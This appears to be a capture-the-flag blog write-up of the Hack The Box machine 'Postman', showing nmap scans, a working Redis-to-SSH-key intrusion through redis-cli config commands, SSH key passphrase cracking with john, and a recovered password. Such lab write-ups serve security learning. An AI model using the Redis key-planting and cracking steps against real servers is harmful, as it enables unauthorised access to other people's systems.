Home Postman
Post
Cancel

Postman

Link of the box: Postman

Enumeration (NMAP)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
nmap -p- -vvv -n --min-rate 5000 -T5 10.10.10.160 -oN ports
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-18 12:15 EST
Initiating Ping Scan at 12:15
Scanning 10.10.10.160 [2 ports]
Completed Ping Scan at 12:15, 0.16s elapsed (1 total hosts)
Initiating Connect Scan at 12:15
Scanning 10.10.10.160 [65535 ports]
Discovered open port 22/tcp on 10.10.10.160
Discovered open port 80/tcp on 10.10.10.160
Increasing send delay for 10.10.10.160 from 0 to 5 due to 13 out of 32 dropped probes since last increase.
Warning: 10.10.10.160 giving up on port because retransmission cap hit (2).
Discovered open port 10000/tcp on 10.10.10.160
Discovered open port 6379/tcp on 10.10.10.160
Completed Connect Scan at 12:16, 29.82s elapsed (65535 total ports)
Nmap scan report for 10.10.10.160
Host is up, received syn-ack (0.16s latency).
Scanned at 2021-11-18 12:15:53 EST for 30s
Not shown: 39849 closed ports, 25682 filtered ports
Reason: 39849 conn-refused and 25682 no-responses
PORT      STATE SERVICE          REASON
22/tcp    open  ssh              syn-ack
80/tcp    open  http             syn-ack
6379/tcp  open  redis            syn-ack
10000/tcp open  snet-sensor-mgmt syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 30.03 seconds
```bash

```bash
nmap -p22,80,6379,10000 -sC -sV 10.10.10.160 -oN scan      
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-18 12:18 EST
Nmap scan report for 10.10.10.160
Host is up (0.17s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.35 seconds

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
# Nmap 7.91 scan initiated Thu Nov 18 12:19:22 2021 as: nmap --script vuln -oN vulns 10.10.10.160
Nmap scan report for 10.10.10.160
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_  /upload/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.1.1
| http-sql-injection: 
|   Possible sqli for queries:
|     http://10.10.10.160:80/js/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.10.160:80/js/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.10.160:80/js/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://10.10.10.160:80/js/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.10.160:80/js/?C=S%3bO%3dD%27%20OR%20sqlspider
|     http://10.10.10.160:80/js/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.10.160:80/js/?C=M%3bO%3dA%27%20OR%20sqlspider
|_    http://10.10.10.160:80/js/?C=D%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
10000/tcp open  snet-sensor-mgmt
| http-vuln-cve2006-3392: 
|   VULNERABLE:
|   Webmin File Disclosure
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2006-3392
|       Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
|       This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
|       to bypass the removal of "../" directory traversal sequences.
|       
|     Disclosure date: 2006-06-29
|     References:
|       http://www.exploit-db.com/exploits/1997/
|       http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
|_sslv2-drown: 

# Nmap done at Thu Nov 18 12:21:07 2021 -- 1 IP address (1 host up) scanned in 105.27 seconds

Exploitation

There are a lot of exploit found on the system, but the only thing that worked was to upload an ssh file to the redis account.

https://book.hacktricks.xyz/pentesting/6379-pentesting-redis

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
ssh-keygen -f rsa
(echo -e "\n\n"; cat rsa.pub; echo -e "\n\n") > spaced_key.txt
cat spaced_key.txt | redis-cli -h 10.10.10.160 -x set ssh_key
OK
                                                                                                                                                                                 
┌──(kali㉿kali)-[~/Desktop/Postman]
└─$ redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379> exit
                                                                                                                                                                                 
┌──(kali㉿kali)-[~/Desktop/Postman]
└─$ ssh -i rsa redis@10.10.10.160

Image

Inside the opt folder there’s an rsa private key. We can then use john to crack the rsa key. We also need to convert the key to john format.

https://github.com/openwall/john/blob/bleeding-jumbo/run/ssh2john.py

python ssh2john.py Matt > crack.ssh john –wordlist=/usr/share/wordlists/rockyou.txt crack.ssh

Password : computer2008

Image

We can then login into Matt’s account and also into Webmin.

Now, there’s an exploit in the Webmin version that we needed a user account. This can be easily searched in google.

Image

This post is licensed under CC BY 4.0 by the author.